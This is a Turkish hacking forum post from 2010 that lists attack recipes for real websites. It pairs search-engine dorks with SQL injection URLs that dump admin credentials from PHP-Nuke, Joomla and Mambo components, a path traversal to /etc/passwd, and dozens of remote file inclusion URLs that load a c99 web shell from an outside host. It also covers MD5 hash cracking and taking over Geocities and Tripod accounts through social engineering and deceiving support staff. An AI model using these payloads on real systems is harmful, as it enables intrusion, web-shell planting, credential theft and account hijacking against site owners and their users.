Lyrics
KorgeneraL
 Mesaj Sayısı : 153
Kayıt tarihi : 20/05/10
Yaş : 39
Nerden : TURKEY
 |  Konu: bazı hack kodları buyrun  C.tesi Mayıs 22, 2010 3:41 pm | |
| panel açığı
arama kodu :inurl:ypanel
site sonuna ypanel/siteayarguncelle.asp
daha sonra editör olarak giriş yapıp kul.adı ve şifrenizi yazın haber ekleme bölümünden istediğinizi yapın
yahoo dan site hackle
ilk ønce www.yahoo.com a giriyoruz .
orda arama yerine bu kodu yapistir: PHP-Nuke Copyright  2005
sonra da arama yaptikdan sonra yukarda arama yerinin yaninda kucuk harflerle options yaziyo ona bas.
ve karsina iki uc tane kucuk sey gelcek birincisine bas.
sonra yeni sayfa acilcak....
o sayfada en altta ulkelerin ismi var hangi ulkenin sitelerini hacklemek istersen o ulkeyi sec...ve assagida seacrh a bas yani aramaya bas..
sonra 2-3 sitelere git ve ordan bi site sec sitenin sonundakileri sil ve bu kodu yapistir: modules.php?name=Search&type=comments&query=not123 exists&instory=/%2a%2a/UNION/%2a%2a/SELECT/%2a%2a/0,0,pwd,0,aid/%2a%2a/FROM/%2a%2a/nuke_authors
sonra birazcik assagida md5 kodu cikacak
sonra bu kodu kopyala ve md5 kiran bi sitede sifresini bul.
sonra tabi admin ismide o md5 kodlarinin yaninda. ve site sonuna /admin.php ekle ve enterle.
sonra admin paneline giris yap..
Oscommerce 2.2 Açığı
Şimdi sizlere basit bir file maneger açığı anlatacağım...
1->Bir arama motoruna gidiyoruz...
2->"admin/file_manager.php" diye aratıyoruz...
3->Çıkan sitelerden şu url’ye gittiğimizde
hedef.com/admin/file_manager.php işte burası file maneger sayfası...
4->Sonra şu şekilde
hedef.com/admin/file_manager.php/etc/passwd yazarak sitedeki şifreleride alabiliriz...
joomla güzel bir açık
aratma kodu: com_neoreferences
exp:index.php?option=com_neoreferences&Itemid=27&c atid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*
İnurlxpoll acogo
İnurl:xpoll şimdi aratma kodumuz inurl:xpoll dicez herhangi bi seteye gircez sitenin linki böle olcak örnek /xpoll/admin/images/ yada link http://www.roodwitv.nl/xpoll/admin/images/ böle olcak örnek werdim ordaki attacker.htm !
more tags
şimdi ilk önce googleye more_tags die aratıoz sonra 15 sayfalara gelioz sonu more_tags die biten bi siteye girioz sonra more_tags ı silip yerine signup.php yazıoruz sonra üyelik yeri gelcek ve üye oluoruz orayı sallayabilirsiniz de ve üye olduktan sonra signup.php yi silioz onun yerine my_profile.php yazıyoruz oraya geldiğimiz de bi resim kutucuğu olur oraya hazırladığımız index i koyuyoruz ama eğer resim kutucuğu yoksa başka siteye deneyin index i eklediğimiz de orada "x" işareti çıkacak çıkmazsa başka siteye deneyin çıkarsa üzerine gelin ve sağ tuş özellikler deyin sonra ordaki siteyi alın ve adres çubuğuna yapış tırın ve sonra hacklemiş olursunuz saygılarımla
allinurlcom_quran
Dork1: allinurl:"com_quran"
Dork2: inurl:"/index.php?option=com_quran"
Exploit
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--
Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--
com_gmaps Açığı....
Google Araması
inurl:com_gmaps
Sitelerimiz Çıktı , Sonuna Sql Kodumuzu Ekleyelim...
Code:
index.php?option=com_gmaps&task=viewmap&Itemid=57& mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
Sitelerin Çoğu Md5 Veriyor , Hasları Kırın
Her hashı kırmayabilir...
com_jjgallery
inurl:"com_jjgallery"
Aratıoruz ... İlk sayfayı geçin...
Kod:
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=Shell?
Sitenin sonuna eklein...
elite forum hack
EliteForums v1.0.0.0 nasil hacklenir diyorsanız..!
Oncelikle google'ye giriyoruz
sonra
/eliteforum/ aratıyoruz
acilan siteler orda cikar siz sadece boyle forumlar hackleyebiliceksiniz
http://www.siteadi.com/eliteforumsadece
/eliteforum
buldugumuz siteyi
for example:
www.siteadi.com/eliteforum bunun arkasina bir code yaziyoruz
/data/users/userdb.dat
simdi site boyle bir hale geldi
www.siteadi.com/eliteforum/data/users/userdb.dat entera basip sayfati aciyoruz
allah allah codlar cikti
siz admin username ve admin passwordu birinci yerde codlarini bulabilirisiniz
<#!USER!#><#!UNAME!#>tegan<#!ENDUNAME!#><#!PWORD !# >a1d0c6e83f027327d8461063f4ac58a6<#!ENDPWORD!#>
simdi
username : tegan
password : a1d0c6e83f027327d8461063f4ac58a6
bu kodu : a1d0c6e83f027327d8461063f4ac58a6 alip sifreye ceviriyoruz
GData: An Online MD5 Hash Databasesifreyi kutuya atiyoruz a1d0c6e83f027327d8461063f4ac58a6
ve karsimiza pasword cikti...
inurl:"com_flyspray"
Site Sonuna:
/components/com_flyspray/startdown.php?file=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_admin"
Site Sonuna:
administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:index.php?option=com_simpleboard
Site Sonuna:
/components/com_simpleboard/file_upload.php?sbp=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_hashcash"
Site Sonuna:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_htmlarea3_xtd-c"
Code:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_sitemap"
Code:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_performs"
Site Sonuna:
components/com_performs/performs.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_forum"
Site Sonuna:
/components/com_forum/download.php?phpbb_root_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_pccookbook"
Site Sonuna:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:index.php?option=com_extcalendar
Site Sonuna:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"minibb"
Site Sonuna:
components/minibb/index.php?absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_smf"
Site Sonuna:
/components/com_smf/smf.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Site Sonuna2:
/modules/mod_calendar.php?absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_pollxt"
Site Sonuna:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_loudmounth"
Site Sonuna:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_videodb"
Site Sonuna:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://megaturks.by.ru/c99.txt?
Google Araması:
inurl:index.php?option=com_pcchess
Site Sonuna:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_multibanners"
Site Sonuna:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_a6mambohelpdesk"
Site Sonuna:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_colophon"
Site Sonuna:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_mgm"
Site Sonuna:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_mambatstaff"
Site Sonuna:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_securityimages"
Site Sonuna:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Site Sonuna2:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_artlinks"
Site Sonuna:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_galleria"
Site Sonuna:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_akocomment"
Site Sonuna:
/akocomments.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_cropimage"
Site Sonuna:
administrator/components/com_cropimage/admin.
cropcanvas.php?cropimagedir=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_kochsuite"
Site Sonuna:
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_comprofiler"
Site Sonuna:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_zoom"
Site Sonuna:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Site Sonuna2:
/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_serverstat"
Site Sonuna:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=htt p://megaturks.by.ru/c99.txt?
Google Araması:
inurl:"com_fm"
Site Sonuna:
components/com_fm/fm.install.php?lm_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:com_mambelfish
Site Sonuna:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.megaturks.com/images/shell.txt?
Google Araması:
inurl:com_lmo
Site Sonuna:
components/com_lmo/lmo.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
DÜNYANIN EN BASİT HACK YOLU
ilk önce bir arama motoruna giriyoruz
inurl:"/cgi-bin/ourspace/
aratıyoruz çıkan sitelerden birine girelim sitenin adresinin sonuna
/cgi-bin/ourspace/newswire/uploadmedia.cgi
HOST SİTE AÇIKLARI
arama : inurl:signinform.php?msg
bunu aratıyoruz.çkan sitelerin sonuna[ signinform.php?msg=buraya ne yazarsanız ] ve bunu yapıştırdık sonuna yazdığınız şey çıkıyor bu bir açıktır host sitelerindeki açık kullanabilirsiniz kesinlikle bir hack değildir ama zone kasabilirsiniz bunla
com_forum
Google Araması: inurl:"com_forum"
KOD: /components/com_forum/download.php?phpbb_root_path=[c99 SheLL Adresi]
forum sitelerini hacklemek
Simdi http://www.google.com da "powered by xmb 1.6" diye aratıyoruz. Karşımıza http://site/forum/index.php xmb forumlu linkler geldi diyelim. Şimdi bu forumda bulunan bir bug(açık)dan yararlanacağız. Onun için ilgilenecegimiz link şu olacak:
http://site/forum/index_log.logBiz index e giren bütün herseyi bu index_log.log dan ögreneceğiz,bu linke tıkladıgımızda bilgisayarımıza o index loglarını kaydetecegiz ki girenleri görebilelim.
Mesela;
Welcome to the 8th Air Force Museum veya
http://www.liston.biz/pinenut_forum/index.php adlı siteye ben denedim.
http://www.liston.biz/pinenut_forum/index_log.log buraya tıkladım.Bilgisayarıma index loglarını indrdim. ve bu dosyayı .htm diye kaybettim.Daha sonra içini açıp bakıyoruz.Herşey burda ne geldi görelim:
xmbuser=gamerg; xmbpw=9156a3c65cd927934f6a1bdd536257b7 28/05/2004 02:12:56|212.106.84.37 ( gamerg nickli sahıs
156a3c65cd927934f6a1bdd536257b7 md5 algoritmalı sifre ile siteye 28/05/2004 02:12:56 tarihinde 212.106.84.37 ip numarasından foruma giriş yapmış..Peki burdaki md5 algoritma nedir.Bu php li sitelerde user passları icin yapılan algoritmadır.Bütn php li sitelerde bu algoritma gecerlidir.En önemli özelliği geri dönüşünün olmamasıdır.Yani şifreni unuttum dersen eski sifren asla geri gelmez ve site sahibi bile senin şifreni bilemez.Peki bu şifreler kırılır mı? Evet CoŞar kardeşimiz bunun nasıl kırılacağını "yeni başlayanlar" bölümünde belirtmiş.John (yani JTR),md5crack,brute force atack..gibi programlarla kırıyoruz. Uzun sürüyor Çünkü md5 li sifreler kriptoludur.Bunları decrypt (sifresi cözülmüş)yapmalıyız.Sonra siteye login oluyoruz.ama once admin nicki ve passını bulmalıyız.."admin" nicki yoksa siteye en cok girenlerden biri admindir.
bedava siteleri hacklemek
Geocities, Tripod gibi ücretsiz yer veren siteleri hack Etmek
Bi web sayfasını hack etmenin en kolay yolu Backoffricele adama bağlanıp email şifresini çalmaktır..eğer sayfa xoom tabanlı filansa
zaten Backoffrice sayfanın şifresini size göstericek. Diilse adamın int. Şifresini alın passes komutuyla email adresi şifresiyle aynıdır daha sonra ise Geocities ,xoom ..ya mail attın bunların hepsinde şifremi unuttum email adresime postalayın bölümü vardır o bölümden
mail atın 5 dakka sonra adamın mail hesabına girin..o kadar basit.
Geocitiesi hack etmek için önce Hotmail gibi bi yerden bi email adresi alın sonra Geocities adreslerini tarayın sayfanın sahibinin ad
soyad doğum tarihini ve email adresini veren bi sayfa bulun. color=#0049aawww.geocities.com/SiliconValley/1001 den başlayın 1002
1003.....tarayın.tataa buldunuz şimdi color=#0049aahttp://www.geocities.com/help/pass_form.html adresine gidin (bu adres değişmiş olabilir ama daima geocities in içinde help bölümündedir!)Formda Geocities in database indeki email adresini sorduğunda adamın amil adresini yazın ve daha sonra yeni emaili işaretleyin ve Hotmailden aldığınız email adresini yazın ve daha sonra hotmaile uğrayın aa şifreyi göndermişler.
Ama göndermeyede bilirler kesin bi ihtimal diildir bu (yoksa her önüne gelen geocitiesi kırardı )Eğer geocitiesdeki yönetici
sandığımızdan daha akıllıysa adama mail atın ve yanlışlıkla şifreyi değiştirdiğinizi ve email adresiniziz değiştiğini söyleyin eğer şifreyi
değiştirdiğinizi duyarlarsa ailenizin sizi öldüreceğini söylemeyi unutmayın!
özellikleri websayfasında yoksa sayfanın sahibine mail atın kalem arkadaşı olmak istediğinizi söyleyin ve adamı kafaya
alıp bütün özelliklerini alın ve formda yerine yazın =)
TRİPODU KIRMAK
Tripod’u kırmak için sadece internet hesabına ve 1-2 hafta süreye ihtiyacınız var.Önce adamın Tripoid user nameine ihtiyacınız var.
color=#0049aahttp://members.tripod.com/~username (user name bu adreste en sona yazdığınız işte)sonra adamın gerçek ismini öğrenmelisiniz:
color=#0049aahttp://www.tripod.com/planet/profile/search.html adresinden adam hakkında bildiğiniz herşeyi yazarak öğrenebilirsiniz eğer
member profile girebilirseniz adam hakkındaki herşeyi öğreniceksiniz city,country...Eğer bu adresten bulamazsanız adam buraya bi
member profile koymamış demektir o zaman Icq dan info çekin adama =)
"If you need to change your email address, please contact us at color=#0049aamembership@tripod.com with your new email address. Please include
your member name, old email address, and full name in the message." **************************************end
Bu yazıda diyoki email adresinizi değiştirdiyseniz kullanıcı adınızı ve eski email adresinizi tüm isminiz ve soyisminizi yazın vve yeni
email adresinizi (hotmailden aldığınızı)Sonra size böyle bi email gelicek
Dear "User", Thank you for informing us of your new email address. We have updated your membership information:Tripod member
name: eskikullanıcıadı (unchanged) | |
|
Yusuf
Root Administratör
Mesaj Sayısı : 337
Kayıt tarihi : 18/05/10
Yaş : 37
| | Konu: Geri: bazı hack kodları buyrun Paz Mayıs 23, 2010 1:06 pm | |
| | |
|
